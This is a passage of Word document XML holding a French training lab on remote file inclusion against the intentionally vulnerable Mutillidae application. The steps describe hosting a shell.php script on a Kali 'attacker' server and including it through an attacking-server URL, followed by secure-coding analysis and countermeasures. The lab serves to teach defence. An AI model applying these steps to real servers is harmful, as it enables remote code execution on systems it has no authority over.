          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E05565A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Est-ce que le niveau de sécurité 5 permet d’éviter cette brèche d’information ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEBC3F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1898F9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Expliquer le mécanisme de sécurité mis en œuvre dans le code source de la page index.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB16B5D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A709FA2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA8E352" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="__RefHeading___Toc5083_3014362717"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>Deuxième défi : Inclusion distante de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23256F9F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre51"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="__RefHeading___Toc5085_3014362717"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Objectif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37EE64" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Le but de cette première série de questions est de travailler sur des inclusions distantes afin de faire exécuter sur le serveur cible un code malveillant hébergé sur le serveur web du pirate. C’est la machine kali qui contient burpsuite qui fera office de serveur web malveillant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1650A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004E3470" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre51"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="7"/>
      </w:pPr>
      <w:r>
        <w:t>À vous de jouer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E4D48" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t xml:space="preserve">Les questions suivantes se traitent en suivant les étapes décrites dans le dossier documentaire. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18279D86" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D2E1CA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Injection distante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CE07E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AD2101" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour tester une injection distante, un mode opératoire est proposé sur l’application Mutillidae via la fourniture d’un script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D81E64" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3912EC46" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Positionner le niveau de sécurité à 0 puis démarrer le serveur web apache présent sur la machine kali via la commande service apache2 start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FEFC58" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42237750" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Tester l’injection d’un lien externe (google par exemple ou une autre ressource locale si votre maquette n’a pas d’accès à internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A50C81" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DDA5E8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Créer le script proposé par Mutillidae sur la page suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D325E1E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRPr="0011432D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011432D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hints and Videos=&gt; Remote File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70517E83" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011432D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Nommer le script shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F4AB9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25925AAC" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="26" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1845639D" wp14:editId="390B4AFD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4037965" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2"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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4037965" cy="942975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD4C8D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655EC148" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29D9B8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03925DA3" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211ED802" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37519B7F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C717A6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E32435" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:tab/>
        <w:t>Déplacer ce script sur le serveur web du pirate puis tester son fonctionnement local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F0C41F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A09BF3" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Tester l’injection distante de ce script depuis l’application Mutillidae via l’url suivant qu’il faut adapter : (http://mutillidae  et http://[ATTACKING SERVER IP ADDRESS])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B9196" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5CCA43" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="27" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0148944C" wp14:editId="586DC68E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>50800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5758815" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3" name="Image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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="199390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC82A9B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:tab/>
        <w:t>Qu’observe t-on ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501753F9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FD653B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Codage sécurisé et analyse du code source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79213FE1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9C8477" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Le but de cette deuxième partie est de tester à nouveau l’attaque après activation du codage sécurisé et de comprendre le codage mis en place pour sécuriser la page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E928819" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267BE9C5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Tester les niveaux de sécurité 1 et 5 et confirmer le comportement observé lors de l’injection locale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3F75D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF5B1F5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consulter le manuel PHP afin d’expliquer le rôle de la fonction preg_match présente dans le code sécurisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8D18E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234C0E5A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CF5D66" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Prolongement possible :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293EEF91" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E795B86" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t>Reprendre une application existante et mettre en place le niveau de sécurité 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B91951" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180D1929" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006600"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498B007A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="__RefHeading___Toc5099_3014362717"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>Contre-mesures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749E2634" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722C8994" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Les injections locales ou distantes ont lieu lorsqu’une application inclut dans une page un flux ou un fichier qui est défini via une entrée utilisateur. Ce flux doit être vérifié avant d’être exécuté.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6FA2A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD7D96C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Pour se prémunir des attaques par injection de fichiers, il n’y a pas d’autre manière que de filtrer et valider les entrées utilisateurs. Il ne faut jamais inclure ou exécuter directement une entrée utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCFEF8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Pour le cas des injections distantes, il est possible de désactiver les directives “allow_url_open” et “allow_url_include” à “Off” si leur utilisation n’est pas nécessaire.</w:t>
      </w:r>
    </w:p>
